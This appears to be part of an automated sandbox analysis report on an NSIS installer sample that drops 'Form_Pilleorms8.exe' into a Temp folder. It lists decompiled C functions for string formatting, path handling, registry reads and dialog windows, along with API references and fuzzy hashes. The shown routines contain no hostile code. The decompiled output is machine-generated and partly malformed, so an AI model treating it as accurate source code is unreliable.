                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                        • String ID:
                        • API String ID: 2584051700-0
                        • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                        • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                        • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                        • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                        				char _v68;
                        				char _v132;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t23;
                        				signed int _t24;
                        				void* _t31;
                        				void* _t33;
                        				void* _t34;
                        				void* _t44;
                        				signed int _t46;
                        				signed int _t50;
                        				signed int _t52;
                        				signed int _t53;
                        				signed int _t55;
                        
                        				_t23 = _a16;
                        				_t53 = _a12;
                        				_t44 = 0xffffffdc;
                        				if(_t23 == 0) {
                        					_push(0x14);
                        					_pop(0);
                        					_t24 = _t53;
                        					if(_t53 < 0x100000) {
                        						_push(0xa);
                        						_pop(0);
                        						_t44 = 0xffffffdd;
                        					}
                        					if(_t53 < 0x400) {
                        						_t44 = 0xffffffde;
                        					}
                        					if(_t53 < 0xffff3333) {
                        						_t52 = 0x14;
                        						asm("cdq");
                        						_t24 = 1 / _t52 + _t53;
                        					}
                        					_t25 = _t24 & 0x00ffffff;
                        					_t55 = _t24 >> 0;
                        					_t46 = 0xa;
                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                        				} else {
                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                        					_t50 = 0;
                        				}
                        				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                        				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                        				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                        				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                        				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                        			}



















                        0x00404d4f
                        0x00404d54
                        0x00404d5c
                        0x00404d5d
                        0x00404d6a
                        0x00404d72
                        0x00404d73
                        0x00404d75
                        0x00404d77
                        0x00404d79
                        0x00404d7c
                        0x00404d7c
                        0x00404d83
                        0x00404d89
                        0x00404d89
                        0x00404d90
                        0x00404d97
                        0x00404d9a
                        0x00404d9d
                        0x00404d9d
                        0x00404da1
                        0x00404db1
                        0x00404db3
                        0x00404db6
                        0x00404d5f
                        0x00404d5f
                        0x00404d66
                        0x00404d66
                        0x00404dbe
                        0x00404dc9
                        0x00404ddf
                        0x00404df0
                        0x00404e0c

                        APIs
                        • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                        • wsprintfW.USER32 ref: 00404DF0
                        • SetDlgItemTextW.USER32 ref: 00404E03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ItemTextlstrlenwsprintf
                        • String ID: %u.%u%s%s
                        • API String ID: 3540041739-3551169577
                        • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                        • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                        • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                        • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00405E0C(WCHAR* _a4) {
                        				WCHAR* _t9;
                        
                        				_t9 = _a4;
                        				_push( &(_t9[lstrlenW(_t9)]));
                        				_push(_t9);
                        				if( *(CharPrevW()) != 0x5c) {
                        					lstrcatW(_t9, 0x40a014);
                        				}
                        				return _t9;
                        			}




                        0x00405e0d
                        0x00405e1a
                        0x00405e1b
                        0x00405e26
                        0x00405e2e
                        0x00405e2e
                        0x00405e36

                        APIs
                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharPrevlstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 2659869361-3081826266
                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403019(intOrPtr _a4) {
                        				long _t2;
                        				struct HWND__* _t3;
                        				struct HWND__* _t6;
                        
                        				if(_a4 == 0) {
                        					if( *0x42aa20 == 0) {
                        						_t2 = GetTickCount();
                        						if(_t2 >  *0x434f0c) {
                        							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                        							 *0x42aa20 = _t3;
                        							return ShowWindow(_t3, 5);
                        						}
                        						return _t2;
                        					} else {
                        						return E00406946(0);
                        					}
                        				} else {
                        					_t6 =  *0x42aa20;
                        					if(_t6 != 0) {
                        						_t6 = DestroyWindow(_t6);
                        					}
                        					 *0x42aa20 = 0;
                        					return _t6;
                        				}
                        			}






                        0x00403020
                        0x00403040
                        0x0040304a
                        0x00403056
                        0x00403067
                        0x00403070
                        0x00000000
                        0x00403075
                        0x0040307c
                        0x00403042
                        0x00403049
                        0x00403049
                        0x00403022
                        0x00403022
                        0x00403029
                        0x0040302c
                        0x0040302c
                        0x00403032
                        0x00403039
                        0x00403039

                        APIs
                        • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                        • GetTickCount.KERNEL32 ref: 0040304A
                        • CreateDialogParamW.USER32 ref: 00403067
                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                        • String ID:
                        • API String ID: 2102729457-0
                        • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                        • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                        • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                        • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E00405F14(void* __eflags, intOrPtr _a4) {
                        				int _t11;
                        				signed char* _t12;
                        				intOrPtr _t18;
                        				intOrPtr* _t21;
                        				signed int _t23;
                        
                        				E0040653D(0x42fa70, _a4);
                        				_t21 = E00405EB7(0x42fa70);
                        				if(_t21 != 0) {
                        					E004067C4(_t21);
                        					if(( *0x434f18 & 0x00000080) == 0) {
                        						L5:
                        						_t23 = _t21 - 0x42fa70 >> 1;
                        						while(1) {
                        							_t11 = lstrlenW(0x42fa70);
                        							_push(0x42fa70);
                        							if(_t11 <= _t23) {
                        								break;
                        							}
                        							_t12 = E00406873();
                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                        								E00405E58(0x42fa70);
                        								continue;
                        							} else {
                        								goto L1;
                        							}
                        						}
                        						E00405E0C();
                        						return 0 | GetFileAttributesW(??) != 0xffffffff;
                        					}
                        					_t18 =  *_t21;
                        					if(_t18 == 0 || _t18 == 0x5c) {
                        						goto L1;
                        					} else {
                        						goto L5;
                        					}
                        				}
                        				L1:
                        				return 0;
                        			}








                        0x00405f20
                        0x00405f2b
                        0x00405f2f
                        0x00405f36
                        0x00405f42
                        0x00405f52
                        0x00405f54
                        0x00405f6c
                        0x00405f6d
                        0x00405f74
                        0x00405f75
                        0x00000000
                        0x00000000
                        0x00405f58
                        0x00405f5f
                        0x00405f67
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405f5f
                        0x00405f77
                        0x00000000
                        0x00405f8b
                        0x00405f44
                        0x00405f4a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405f4a
                        0x00405f31
                        0x00000000

                        APIs
                          • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                          • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,73BCFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                        • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,73BCFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                        • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,73BCFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 3248276644-3081826266
                        • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                        • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                        • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                        • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                        				int _t15;
                        				long _t16;
                        
                        				_t15 = _a8;
                        				if(_t15 != 0x102) {
                        					if(_t15 != 0x200) {
                        						_t16 = _a16;
                        						L7:
                        						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                        							_push(_t16);
                        							_push(6);
                        							 *0x42d254 = _t16;
                        							E00404ED4();
                        						}
                        						L11:
                        						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                        					}
                        					if(IsWindowVisible(_a4) == 0) {
                        						L10:
                        						_t16 = _a16;
                        						goto L11;
                        					}
                        					_t16 = E00404E54(_a4, 1);
                        					_t15 = 0x419;
                        					goto L7;
                        				}
                        				if(_a12 != 0x20) {
                        					goto L10;
                        				}
                        				E004044E5(0x413);
                        				return 0;
                        			}





                        0x00405517
                        0x00405521
                        0x0040553d
                        0x0040555f
                        0x00405562
                        0x00405568
                        0x00405572
                        0x00405573
                        0x00405575
                        0x0040557b
                        0x0040557b
                        0x00405585
                        0x00000000
                        0x00405593
                        0x0040554a
                        0x00405582
                        0x00405582
                        0x00000000
                        0x00405582
                        0x00405556
                        0x00405558
                        0x00000000
                        0x00405558
                        0x00405527
                        0x00000000
                        0x00000000
                        0x0040552e
                        0x00000000

                        APIs
                        • IsWindowVisible.USER32(?), ref: 00405542
                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                          • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$CallMessageProcSendVisible
                        • String ID:
                        • API String ID: 3748168415-3916222277
                        • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                        • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                        • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                        • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                        				int _v8;
                        				long _t21;
                        				long _t24;
                        				char* _t30;
                        
                        				asm("sbb eax, eax");
                        				_v8 = 0x800;
                        				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                        				_t30 = _a16;
                        				if(_t21 != 0) {
                        					L4:
                        					 *_t30 =  *_t30 & 0x00000000;
                        				} else {
                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                        					_t21 = RegCloseKey(_a20);
                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                        						goto L4;
                        					}
                        				}
                        				return _t21;
                        			}







                        0x00406419
                        0x0040641b
                        0x00406433
                        0x00406438
                        0x0040643d
                        0x0040647b
                        0x0040647b
                        0x0040643f
                        0x00406451
                        0x0040645c
                        0x00406462
                        0x0040646d
                        0x00000000
                        0x00000000
                        0x0040646d
                        0x00406481

                        APIs
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,?,?,00406672,80000002), ref: 00406451
                        • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000000,0042C248), ref: 0040645C
                        Strings
                        • C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe, xrefs: 00406412
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CloseQueryValue
                        • String ID: C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                        • API String ID: 3356406503-903505160
                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403B57() {
                        				void* _t2;
                        				void* _t3;
                        				void* _t6;
                        				void* _t8;
                        
                        				_t8 =  *0x42b22c;
                        				_t3 = E00403B3C(_t2, 0);
                        				if(_t8 != 0) {
                        					do {
                        						_t6 = _t8;
                        						_t8 =  *_t8;
                        						FreeLibrary( *(_t6 + 8));
                        						_t3 = GlobalFree(_t6);
                        					} while (_t8 != 0);
                        				}
                        				 *0x42b22c =  *0x42b22c & 0x00000000;
                        				return _t3;
                        			}







                        0x00403b58
                        0x00403b60
                        0x00403b67
                        0x00403b6a
                        0x00403b6a
                        0x00403b6c
                        0x00403b71
                        0x00403b78
                        0x00403b7e
                        0x00403b82
                        0x00403b83
                        0x00403b8b

                        APIs
                        • FreeLibrary.KERNEL32(?,73BCFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                        • GlobalFree.KERNEL32 ref: 00403B78
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Free$GlobalLibrary
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 1100898210-3081826266
                        • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                        • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                        • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                        • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00405E58(WCHAR* _a4) {
                        				WCHAR* _t5;
                        				WCHAR* _t7;
                        
                        				_t7 = _a4;
                        				_t5 =  &(_t7[lstrlenW(_t7)]);
                        				while( *_t5 != 0x5c) {
                        					_push(_t5);
                        					_push(_t7);
                        					_t5 = CharPrevW();
                        					if(_t5 > _t7) {
                        						continue;
                        					}
                        					break;
                        				}
                        				 *_t5 =  *_t5 & 0x00000000;
                        				return  &(_t5[1]);
                        			}





                        0x00405e59
                        0x00405e63
                        0x00405e66
                        0x00405e6c
                        0x00405e6d
                        0x00405e6e
                        0x00405e76
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405e76
                        0x00405e78
                        0x00405e80

                        APIs
                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003), ref: 00405E6E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharPrevlstrlen
                        • String ID: C:\Users\user\Desktop
                        • API String ID: 2709904686-224404859
                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                        				int _v8;
                        				int _t12;
                        				int _t14;
                        				int _t15;
                        				CHAR* _t17;
                        				CHAR* _t27;
                        
                        				_t12 = lstrlenA(_a8);
                        				_t27 = _a4;
                        				_v8 = _t12;
                        				while(lstrlenA(_t27) >= _v8) {
                        					_t14 = _v8;
                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                        					_t15 = lstrcmpiA(_t27, _a8);
                        					_t27[_v8] =  *(_t14 + _t27);
                        					if(_t15 == 0) {
                        						_t17 = _t27;
                        					} else {
                        						_t27 = CharNextA(_t27);
                        						continue;
                        					}
                        					L5:
                        					return _t17;
                        				}
                        				_t17 = 0;
                        				goto L5;
                        			}









                        0x00405fa2
                        0x00405fa4
                        0x00405fa7
                        0x00405fd3
                        0x00405fac
                        0x00405fb5
                        0x00405fba
                        0x00405fc5
                        0x00405fc8
                        0x00405fe4
                        0x00405fca
                        0x00405fd1
                        0x00000000
                        0x00405fd1
                        0x00405fdd
                        0x00405fe1
                        0x00405fe1
                        0x00405fdb
                        0x00000000

                        APIs
